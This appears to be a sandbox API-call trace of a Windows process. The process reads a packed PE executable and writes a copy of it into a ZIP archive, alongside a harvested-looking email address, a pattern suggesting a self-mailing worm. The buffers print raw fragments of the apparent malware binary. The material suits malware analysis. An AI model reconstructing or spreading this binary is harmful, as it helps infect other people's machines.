Buffer => \xd8\xf1\xbb\x08\x9dl\x05]\x80\xc7;\xdd\xc5\xff\x93\xc9\xa2\x1f\x08\x07w?\xff$\x95\xd9[\xe7\xef\x86M\xfa\xe8&D6h\xd8\x06/h\xc8\xe7\xe7\xe7\xe7(h\xb8!h\xa4\x1ah\x94\x13hp\x15\xb3\xe6\xe7\x0chX\x05hHWy\x97E\xbcc\x10hD\x11\x90\x03v\xa9K<\xea.\x11J6h<=\x8c}vr, +hh\x18\x07\x8dV\xf1\xac\x10\x90\x06\x81\xc3\xa6;\x98t/YS\x1c\xdbK\xd0(\x99\xe2\x05\x01a\x8e\x14o\x15\xa4]\x18\x01~$\xdd\xb7\x82\x91Z\xde;\xcat\x08$A\xa2M\xd65\xf4\x03Y\x94\x05@7\xd9\x7f\x84'\x03\x85\xd2\x89U\xfc~\x1a\x19\x1a\x17\x0f\x7f\x03\xfe\x80\xc2a\x88\x147\xad\xfc|\xe6\xc6\x84\x1eG@\xb3I\x14\xdc\xbe\x90\xa4U\xb4\x9f \xdf
\x93V\x1c\x8dp
\x1a\x84\x1d\xa1l \x8bJ\x1d\xb7zZ\xa6i\x9a\xce\x17\x03\x88\x8f\x96\x9d\xe0Md\x9a\xa4\xab\xa6Wh\x0c'4H\xd5m\xca~\x04G FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => l\xca\x02 sPH~$\xe3A\x182\xf0\xfd\xc6f\x07^^\x13\x96&S\xa0\xc9h\xcb\x97\xf3<h\x90X\xd2\x9d\xccPh\x11GA\x1ac\xfe\xafW\xea\xd7
4F3O\xdaS\xba\xa2\x018+\xaa\xc7\x048\x88\xbe;\xba\xa63\x94\x9e\xb0\x06\xea }\xe8I\xc7'\x89\x03\xec\x81;\xaf}\x0ejC\x85\xb3\xdf\xaav\x1e\xeb\x0eP\xb0\xc3\x16\x8c\x13\x11\x07\x82\xd6\x00n\xe2%l\x80&\x00\x1eT\xb7\xff\x02\xf0f\x7f`\xde\xe8Dt9HHt-\x08\x0et\x81\xb0@\xb4\x1c\x04\xd0\xb4\x1f\xea\x02\x9f\xc1
\xcf0\xeb%'\x04Q!\xf4\xe9\x93/\xc3\x81\xc1\xa0\xeb\xef0\xad\xf9\xfdm&1\x88\x16\x80f\x01\x1f\x08\x02\xcfd\x9d\xeb\xe5\xedit\x1d\x04tt\x10wu^\xdc1"8\x02\xb7\x82\xc7\xd7\xff\xb1\x88\xaeW\xd5\xd8\x91\xcb{\xfeBR\x11\xbf2\xd9\x8b\xfd\xe9#\xc7P\x0c\x07&\xdezH\xc3m'hL\xe1V\x18_OP \xfaoS\xd1 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => TW
\xc9F\xaf\xfbAU\x14\x80\x8c"R\_pAL\xb9R\xdc_|\x05\xb9Qc\xd1\xb9\x84#V\x054Q\xe6&\xebvFh\xf8\xabWV\x18P
\x05\x1c\xe0a\xb4i3 H\xc8\xf7R\x15+\xe4\xf3\x0et\x83\x11\xf8\xc0\xc3SHE\xb9\xe1\xa2}\x9f\x1a\x01\xaf\x01~\x08E\x07\x0f\x8c
\xc2h$w\xc0\x8a\x1b\xd3@\xf8\x8f\x89\x9d\x0f\xff\xf1\xd4\xb2\xb1\xcaF\x9aF}\x06\x89\xb5Z 9x\x1b\xde \xfbs\xa1
n\xf8}D\xf8\x89\xbdD\xfaB\xec;s\xc0\x1f^Y\x0cA\x0b\x83|\x92\xdd
K\xf5M\xc3\x8d\xb5O\xf4\xa8\xc4\xb7\xab\xdd^us\x8b\xb1\xbf\x01?E\xb8\xf7\xe0\x02-m\x05\x9f#a#h\xad\x07\x0c\x13\x0c@w\xbb\xc1I\xf5\x15P\x0f\xf4"\x88\x18N?\xfcf'W\xbe
\xceX\x91-'8\x9d'\x89#\xd4\xea\xfcp\xeb\xfd\xd69]\x8e\xc4\x17l7 \x90\xe8X\xeb\x18\xa2\x12\x94\xc0&<!rA\xc3
\x19 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => 4 \xb1\x91\xeeY\xe1\xb5\x00\x86\x8f\xaa"\x0b\x06\x1e[^=4\x8cj\x8b\xaae\xe3\xe3\xd0\xeb
\xd6\x1b\x9a
B\xc9ho\x99\xfb\xe7\xf8u\xec\x08\xecGQ\xe8\xdd\x06B\x11\xeb\xee;\xc2\x01\x00\x83\x07,D\x11\x0f\x01\x8f\xd3\x9b\xa1r\x90\xcf\x05\x13+\x06~\xd1\x89\xc8\x10g~F\x02I\xdeuE\xde\xa0*\x05h,*\xdf\x11\x0e\xd8\xfcj\x99|\x1fw}\x18\xda$`k\xd6>\x88\x13\x0e\x1e\xf7Y\xe0\x8c\xe8\x84\xaf\xfc\xaa\xc6\x948\x87QB\x91$\xfe\xd3\x85\x87O\xe9\xb8\xe4vP\x83\xd8*#\xdfgC\xc0\xdc\xae\xb0*h\xa8R\xa0-L\x9ac\x17\\xff\x985$\x17\xd0\x82\x06\xe9\x9f\xd6\x01\xb1\x80\xb33W\xd9\x1e\x07cH\xc9Ja\xf0\xf7A\x8c\xd8\x87\x07\x10\x10^\xd68\xf8\xb6\xc8D\xdfW\x1f\xd1&\xd8\x99\xac\x15\x92J\xfc\xb3\xe7#~\xbcHz\x82\x00\x14\xdc(\xd1d\x01{\xecr\x01\xdf\xec\xe9\xd2\xdcW\x9f8\xf0\xbc\x02\x8fz}\xe7> FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => t,% \x1agW\xf2y<s&$'25p\x89\x91\xfc&%\xdc%ip\xdc\x007\x1bTs\x06`5{\xf6\xd8u\x04g\xdehh;, \xd0\x19\x9b\xcc\x91\x1e.\xd76|P\x81\xfa\xc2
\x7fR&'\xe3\x9c\xf0\x84})\x0c\x83Ar*\x0b2>\xc9\xd9\x93\x1er\x17\x12\x14
\x0f\x83\xa8\x1a\xbaf(?\xc6G\xe9C\x1c\x1eB\xde\xdcY\x8a\x028h\xd8+<r\x13\xb7\xddvJseB\xd00\xebA?\x07\x03{x%7Hh\x98\xf7\xf76\x048c;\xbbl\xebAY?%\x94X\xf2R\x9c\xc0l\x903\x18\x034\x04\x02v\xa9\xdchHGWKP\x03%"\x0c;\x03\x18\x95\xbbE\xc0\xbe$%X\x110\xa4j\x19\xd5\x05\x03\xf9\xfd0+8+8\xcd%\x1c}\x80\xfc\xfe\x04\xa8\xceD`x\xb9M\x0e_\x9fT\xc2\x05\xb2\xff%\xf8{%\x00Ea\x86\x00\xb2\x00'\x8a",\x03\x88\x12\xa6i\x9a\xe6P\x00\x84\x80|xt FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => \x9f\xff\xff\xfa\xb71\xfd\xfe\xff\x87?\xdai\xbbf\xe0\xab\xc4q\xae\x95D\\xc9Ex\x91\x95\x98\xa4\x8f\xfc\xff\xff\xd8\x9a\xa7\xb9=\xe3^$\x17\xed\x85\x05ch\xb5\xd6\xbek\x02\xe6b\xd5x\xe1\xd2\xf3\xff\xff\xff\xbd\x82\x18\x1a$\xd3\x8dM\xce<\xb5\xae\xbe\x90\x1c\xc5\xc4\x0e?\xe9.\xa1\xa7m\xbfU\x02@\xff\xff\xff\xff\xe2\xe0PI\x0f\xc3?\x12\xb6t\xb3{\xfc\xfa\x93\x96k\xd0\x92\xc7\xaaFMPWDHOUEJ\xff\xff\xff\xffQ\x8fu\x9c\xbeVGKNTA@CBBEC@DP/\xc4\x9aDDGF6n@$5\xff\xff\xff\xff\x1f\x9a\xb7\xb7\xa0\x08/5,5\x06C\x02./I"O%\xbe\xac\xfe\xa0\x125 \x0c\x14\xcc-e\xcd\xff\xbf\xfd\xff\xc0\xad}Dv\x12\x17\x16+a\x18r\x81\xf7\x19\xb1\xcc\xfc\xf9\xbc{r\x9a\xb2\xea\x87\xc4t\xb7\xff\xff\xff\xbfH@Gv\xb8>\x1a9r\x0f\xc1dA\xca\x87\x12j\x86\x11\xcc\xc5 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => \x8e<\xff\xbf\xfd/3\x10\xc2\xc1BN\xcc\xc2O\xe9f\x00\xf6\x9c,\xba<*\xca\x06{\x0c\x0f}\xdfX\xf8\xff\x89+z9\xe9\x11rrn\xd6\xd0\x81\x0c\x18\x01\xccB\xb6\x8aU\xff\xff\xff\xff7x\x16\xd5_Mxq?QQ.\xac.\x9a\xc1vM\xa8\xb6pz\x97<FW\xcf}\xd9\x02\xf2\xf4\xff\xff\xbf\xf0\xb3>\xed<\x86\x9f=\xcf\xbeG\xdb2\xf6\x96<Ew2r\xb7\x18*\x14i[+\xff\xdf\xfe\xffI\xffTW]w\xb7\x95\xb2\x02\xb5\xccUq-!V\<N\xcaP\xc2\x80E\xc8\x15\xc4\xff\xad\xff\xff\x99|\xac\xabs4~-@\x95ZRL\x18H+'oY\xa8\xdfI\xc9v\x02]\xe8\xff\xff\xff\xc2\x87Fz\xb2=g\xe0l\xf9\xf51\x9a\xb9`\x85m\x82\xb0.'\xf78S|\x18\x18\xf8\x05\xfe_\x0f\xb1\xc4~\x03\xb4e\x12\xca\x1cI\x17\xf5\xcaq\x17\xad\xcf\xdf\xf8\xff\x17E\x8c\xbe2MISY\xca\xb9\xca\xc4\xbe=\xaa\xe7_ FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => \x81\x95@\xff\x85\xff\xffM|~
\x86\xce>Q)\xd1\x1e@\xa2}/\xbd)\xda\xc4\x9c!\xabn\xaf\xc2x\xff\xd6\xff\xffm5K\xdb\xcd]\x93\xeeG+\xaf\x18I\x8dEM\x89I@tE\xbd&\xd1\xa7\xd6\xfa\xff\xff[\xb7?`\xbaT\x10s>\xdbQ\xbd\xc1\xe5D\xbc/\x07_\xdbl\x04\x01y\xed\xdf\xf8\xb7\xae\x97\x96p\xd1\x80L)n\xc9\x93\xc2/7W"\xce\xff\xff/\xf4\xce)S]7I\xf4Iqc\xba\xd8\xc5\xecq\xf7iTQ\xc0\x83\xb1cS\xff\xff\xff\xff\,\xf7\x13\x17\x04\xde\x95\x17s\x84\xa9\xd9(\xc2\x90\x01@\x18\xaff|\xfb\x1c\x81\xbf\x15\x9e\x12\x87\x04\x85\xff\xff\xff\xffB\x1co\xd6\x8a\x84.\x87'\x865\x896\x88 \x8a\xa43\xf8V\x8b3\x8a$\x8d\x1d\x8c\x0c\x8f,\x96m\xff\xff\xff\xff\xd6(\x8e"\x91\x90n\x932v\x8a\xef(\xdb\x92\x95\x94\x97f\x96\x16\x99\x1c\xf2\x9dw\x98/^\x9b%\x9a\xc0\x0b\xff\xff\x9d\x0e\x9c\x8c3 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => \xeek\xee\xf6S\x06\xf3\xc8\x1f\xf4\x0e\xaax\xfe\xe6\x06\x87N\xb7\xff\xff\xff\xffz\x8e?G
\x9e\x80\xa2B\x12\x9a\x91\xd9*\xbe\x03\x8e\xc8\x17E5\xf3\xca\x8a\x01t\x012\xa0\x81\xf4\x18\xdf\xda\xea\xff\x83&\xe4\x89*\x95\x84,Pa?<\xca\x0c\xc0Z\xfb\x15\xff\xff\xff\xffzJ\x015z\x83=\x08\xd9\x11\xd19\x89\xbe\x1f\xe8\xf9S\x9c6\xda\x11U\x18\x84z\xca\x86\xb6\x91\x87r\xff\xff7\xf8\xe6\xff\xec\xb5x\xc7<gSvQf=\xca^,y\xe2pG(}\x80&\xfc[|\xab*\x0cO\x17\x8bG\xefR\x18F\xf2\xd8\x17\x14\xff\xff\xff/\x94\x06\xb6z\x16\xe7sF \x16\x08z\x805Pr\xe2\xf4,JJ\x8b\x02\x836x-\xbc\x89\xff\xbf\xf1\x17\x1f+\x83\x1fE\xcc\xf3\xea\xea\xbeO\x1e\x0ba
\xac \x06\xc7\xff\x7f\xab\x7f\xba\xe1\xfa\x91Cy\xbf\xb9\xf8f\xea\xd7\xfc\xc7*P;9u;\x109\xa1\xff\xff\xff\xadi\x10\xf5UF\x18\x0b\xb5\x08\xac FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => y)\x86/KFZj\x8b\xc9\x14\xff\xb7\xff\xff\xe2\x14KY\x0e\xcc\x8f"\xafq\x87\x13\x81X\xd0e\x1f\xbc\x04\xcd1M\xe6\x0b'-\xae\x88_\xe0\xff\xff\x9fWR\x0e4\x8bOB\xa9$\xdd;\x07\xf0\x18)\x94\xcc\x11\x14cJ\xf1\xf4\xfe/\xf4\xffA\x13\xec\xf4cM\xf9\x848\xf2\xabv\xdbr\x81yB5`\x01\xc1}B\xbf\xfd\xff\xb7C\xb8WB\x82\xcb \xbe1\xe8\xde;\xedM\xf7F\x87\x8a!@\xa3\xe8W_\xe0\xdb\xff\x1cM\xa9\xd0\x0b\x12\x13"\xf7\x14\x8eD\xe2\xbda8\xac\x80\xbd\xae\xdf\xe8/\xf4\x80U?\x0bY\xb9
\xf4\xbeS\xc3{D\xa9}\xaf/\xf5\xff[\xffs=K\xbe\x9c\xfez\xa3\x80q\xaa[\xcb_[R\xc1\xff\xbf\xd4\xff\xa0\xe9\x1e\xb7\x98\xd8Z\x88Z6K\xb6\xbe\xb8aX\x00B\x8bu\xc9O\x07\xc9\xff\xff\xbf\xc4\xa1b\x1d\x85N\xbe\xbbM4\xf8\xbd\x17\xd0\xd9\xb1-%\x19\x82\xf2\x11\xc2\xfe\x05\xff\xff/\xf5\x9aUABz FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => \x9b\xc6.\xfa\xff\xff\xff\x92\x96\xcc@\QP\x11nE\x11u\xb6\xcf\xaf,Y\x92\x1fEN\xc4\xe3\xeajq\x1a\xba\x0f\xff\x17\xfe79z`S\xce\xac\xc6<Q\xdf\xa4W\x11mW48\xcaQ\x16\xc1\xf4\xb7\xf8\xed\xd6\x1ck\xc3t\x11\x04N\xd1X\x9e!$'\xdf\xa7\xff_\xe2o,'a\xa7K6\x19\x19\x1b\xc0[\xe2\xed\x11Z@Y\xfd\x87\xed[\xfc\xff\xffP\x89\x14Le\x9f8\xf1\T7r\x16\xf9+i\xcb<(\x1a\xbf\x1b\x83_\xf8\x05\x16\xfa\x8dy\x89[zcC+\xa9\x1b\x80\x06\xa7\xff\xff\xff\x97Uah_\x90)\x8c\xe5P\xb4\x19{\x90\x83\x0e\xff#\xd4Qb\x1f\xab\x1b\xc4I2\x90\xfd_\xfa\xff\x96@\x90\xab\x8d,2\xf5\x11`\xab\x04\xbdv\xba\xae\x9c\xafN\xfe\x8eaEP\xff\xad\xfeKepj\x80\xe4}\x06'\xc0Q\x9e\xec\xe27=\xa5 \xd8\xfb\xff_\xf8j\x07\xcc\xc3\x06\xf21\xfa\x9e\xb3\xfbG\x12 k}GE\x01\x9eB FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => a\xedWA%\xfd_\xf1NJ\x1d\xbcp\xab\xff\xc59\x04'c\xd1\xbf7 \xaaEbz!o%\xfd\xff/-\x03 \xf6\xa5*M
\x01W\x81A\xc1 \xbaE\xcdqB\x8f\xcc\x89\x03yF\x14a\xbe!\xa8c\xff\xb7m\x11m\xcc\x05\x81\xbe\xbe\x16\xc2\x8c\xbe\xaaQ\xd1\x00\xcb{\xe3\xff\x8dG2F\x06@\x9a4F\xca_\xc2\xaf\xbdO3\xac\xf9A+\xdd\x0e\xd8\x11P\x81\x0c2\xae*\x0e\xa5.\xc1\x072\xa5p\x88s3L\xe1\x1d\xd8\xb7\xbaI=\xc2\x8e55\xc8\x84/\x88\xc2B\xf6\x84\x0c4a\x00\x1cL\x0b\xfc\xb7\x7f\xc2\x80C\xc0\xbcA\xb2\x95\xc2\x90@\xccUn\xc2\xbc\xf9NJ\xf1F\xee\xcbC\x03\x94\xa4\xb6\xa8"\x8b\xfe\xd2\xff
\xf4C\xc2\x83E\xc8F\xc2\x86E\xc2\x086\xb0@\x8e\xa8
\x97\xd8\xba\xef\x16\x1f\xc8\xb6\xf85\xa9\xcb)m\xcd@6\xc1\xc2o\xf5\xb6\xc1~@V\xcaF\xcb\x1eET\xa96\xf8\xfd\xbf\x0e\x81Q\xc7\x85h\xb9\xc1 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => z\x19\xf2\xce\x10\x14\xa2x\xae[P\x08"97\xa1+3*a*!\x02J\x0ff\xb3T\xcd \x01\xa1U\\x0f\x16\xb0\xdfNBuffA\x0f\x0bLow\xf6\x19\xb6#wvIr\x94#w
\x85\x9bqZ\xf4\xcc\x0cM\x82\xc2\x00\xa8mY\xb6M\xd7\xb7\xd8b@\xff\x04\x02\x13\x0beY\x96e4\x17\x12\x10\x03\xabeY\x96\x0f \x14s9\xbf\xff\x84\xbc<PEL\x01\x03\xe0\x00\x0f\x01\x0b\x01\x07\xae{\xd2l\x13r*\x802\x04\x10\x03\x82lg\xb1\x905\x0b\x023\x04\x99[\xd2\xcd\x07\x0c\xd0\x1e4{\xd9\x1b\xd8\x10\x07\x06\x00\xc0y\x08@\x80[dx\x02\x18\x05F\xb8\xc2v+dx\x01\x1e./\xd8\x93\xa0\x98\xa4p\x90\xeb6\x7f\xbb\xb0\x04# \x0b`.data\x98#\xeeB\xba\xc1\xfb"'v@\xbd\xcd`\x1b\x85.\xe5 \x00\xc3\xc0\x06|\xbf){4'@\x1b\xb0{
\x94\x00\x00JA< \x00\x00\x00\xff\x00\x00\x00\x00\x00 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x00\x00 \x00\x00\x80\x0e\x00\x00\x00\x90\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00@\x00\x00\x80\x02\x00\x00\x00h\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00X\x00\x00\x00\xd8\xf0\x00\x00\xe8\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\x80\x00\x00\x00\xc4\xf3\x00\x00(\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xd0\x00\x00\x80\xa8\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\xc0\x00\x00\x00\xf0\xf4\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x000\x00\xe0\xc0\x00\x00(\x00\x00\x00 \x00\x00\x00@\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x80\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => \x80\x00\x80\x00\x80\x80\x00\x00\xc0\xc0\xc0\x00\x80\x80\x80\x00\x00\x00\xff\x00\x00\xff\x00\x00\x00\xff\xff\x00\xff\x00\x00\x00\xff\x00\xff\x00\xff\xff\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8f\xff\xff\xff\xff\xff\x00\x00\x88\xff\xff\xff\xff\xf8\x00\x00\x8f\x8f\xff\xff\xff\x8f\x00\x00\x8f\xf8\xff\xff\xf8\xff\x00\x00\x8f\x8f\x88\x88\x8f\x8f\x00\x00\x88\xf7\xf7\xf7\xf7\xf8\x00\x00\x8f\x7f\x7f\x7f\x7f\x7f\x00\x00\x08\xf7\xf7\xf7\xf7\xf0\x00\x00\x00\x8f\x7f\x7f\x7f\x00\x00\x00\x00\x08\xf7\xf7\xf0\x00\x00\x00\x00\x00\x88\x88\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xe0\x03\x00\x00\xf0\x07\x00\x00\xf8\x0f\x00\x00\xfc\x1f\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xf0\xc4\x00\x00\x00\x00\x01\x00\x02\x00 \x10\x00\x01\x00\x04\x00\xe8\x02 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => \x0b2}\x99\xfeL\x82m\xf4\xb7p>\x0b\xb4\x02\xdc\xf4^s\x8e\x0b\x98~I\xf4"\xd0\x00\x0b.K\x99\x95\xbez\x87\xaa\xe9\x8e'\xaa\xe9\x85\x0e\x15A\x85y\xaa\xe9\x84\x7fq\x04*m\xc3\xbf\xf3\xafe\xc3\xc2\xc6D\x18\x06\x90{O\xf9\x12\xab\x96\xd0K\xb4\xe7\x13m\xab\xd2(\xdckZ=}{O\xf8Ny\x85\xa5h\x83\xfa1\xda\xd7\xe74og@\xf6\xf1\xbc\xad\xcfal\x12\xf4\xbc\xbc\xad\xce(l \xfc\x0fg@^\x8d\xa0\x0c\x14\xab\xf4\x11\xc1cD\xb6\xa6\x94[\x03\xa0;\xf6
\xe1\xa3O\xc3\xaa-P5\xef3U\xf3\xeb:\x12r\xc0\x13\xfd\xfe\xfe\xf7\xf6\xcb\x0eZFo\x1b\x7f\xe9}t\x91\xfd,\x12\xcd\xe7\x8d?\xe9\xf6\xc8\x0f\xe0l\x8e\xb7\xaeS\xd9I4\x8846\xb8\x9c\x11x]S\xd9H\xd8\x97\x81\x03&\x9c\xb4\x9e\xb08\x93\xac"gl\x9d\x89\x88 g\xdf\x88\xa4\xf3\xa2\x88&?}\x88\xed\xa3T\x88\x05\xe9]\x97Tl\x19\x9cc,3 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => \xaeX\xa8\xb6\xfaEA\xb0\x91\x0fW%^\x0bU\x12\x91\x0fWEUW\x19\xf3\xfaEaP\x91\x0f]^\xb3\x01`\x9bC\xc8\x00\xf1\\x7f\xf4mH\x0e\xd4\xceW\xbb$e\xe7\x1c\x96\x04W\xbb3\x82\xe7\x15\x06h\x99\xeaZI\xca\x05\x85\x97\xcd\xfe\xb5^b\xe5\xeeKi\xd9;\x91\xcd\xf7\xb6\x06\xa6\xbd\xa5\xb8\xa6\xbd\x8e\xe8\x921e\xcbb*7\xe9\xc6%\x82\xe0}r\x1b"v\x8b\x1f\xaf\xf2H?\xdagO\x9a?m\x99hD\x1c\x9c\xb6O\xe7\x93\x07\x87#\xcbH\xf4\xf8%d\xdb\xf8&\x7f\x90\xec\xa5M\xd7\xf3T\xd8d\xe3\x18$\xbe\xa9v\x92P\xffw\xce\xc7V\xf3\x06W\xa9h?\x9f\xa9\xc0\xd2\x1fV\xeeN\x83V\x83\x02\xa4\xa9\xe9\xb3v FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,478 | 364 | NtReadFile |
Buffer => FileHandle => 0x00000188 |
FAILURE | 3221225489 | |
| 07:44:02,478 | 364 | NtSetInformationFile |
FileHandle => 0x00000188 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:44:02,478 | 364 | NtQueryInformationFile |
FileHandle => 0x00000188 FileInformation => \x00\x80\x00\x00\x00\x00\x00\x00\xc0p\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:02,478 | 364 | NtWriteFile |
Buffer => PK\x03\x04
\x00\x00\x00\x00\x00\x81\x95\xde0+[\xff\xe3\xc0p\x00\x00\xc0p\x00\x00\x19\x00\x00\x00 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,488 | 364 | NtWriteFile |
Buffer => premium-server@thawte.com FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,488 | 364 | NtSetInformationFile |
FileHandle => 0x00000188 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:44:02,488 | 364 | NtReadFile |
Buffer => MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4 \xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode.
$\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PE\x00\x00L\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x0f\x01\x0b\x01\x07\x00\x00`\x00\x00\x00\x10\x00\x00\x00\x80\x00\x00 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,488 | 364 | NtWriteFile |
Buffer => MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4 \xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode.
$\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PE\x00\x00L\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x0f\x01\x0b\x01\x07\x00\x00`\x00\x00\x00\x10\x00\x00\x00\x80\x00\x00 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,488 | 364 | NtReadFile |
Buffer => \xff\x87\xa8\x90\x00kernel32.d\xff\x9b\xe7\xdfll5root\IEFrame\x00ATV\xfe\xff\xfcH_Noterctrl_renwnd\x0f\xff\xb7\xff\xff|y_\xee\xcf\xb9\xdd\xdeg;\x84\x15\x80\xd4\x00\x1e8 \xb2\x9f\xfb\x15\x00\x8d\x06\x18x\xb6\xff\xff\xff\x0f@@\x03\x00\x1d+\xf4A\x81O\xcd\xfc\xff\xd7%k\x08\x00\x01@<\x8fS\x016@\xffn\xff\xdfT\xf1\xfd\xa73\xbb\xbd\x9aA\x14\x04W\x85\x0e\x06@]\x10\x00\x18\x04/\xb7\xdb\xdd@\x08\x1f\x00-
\x03y(\x07\xa4,\x8a\xdc\x02\x97\xbf\xfc\xe5\x00\xbe\x0e/\x1b\x00\x00\xbf\x06\xa78\x04\x00\x85/\x05\x13\xb7\xb7\xff\xf2\x01\x00\x15]\x8e_\xce\x0bDec\x00\xa3v\x00O\x9f\x00S\xdd\xbe\xfb\xdbep^ug\x00Jul\x03n\x00May\x0fprk\x97\xed\xcd\x07\x03Feb\x13aSa'\xdds\xb7\xed\x7fi\x00Thu FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,488 | 364 | NtWriteFile |
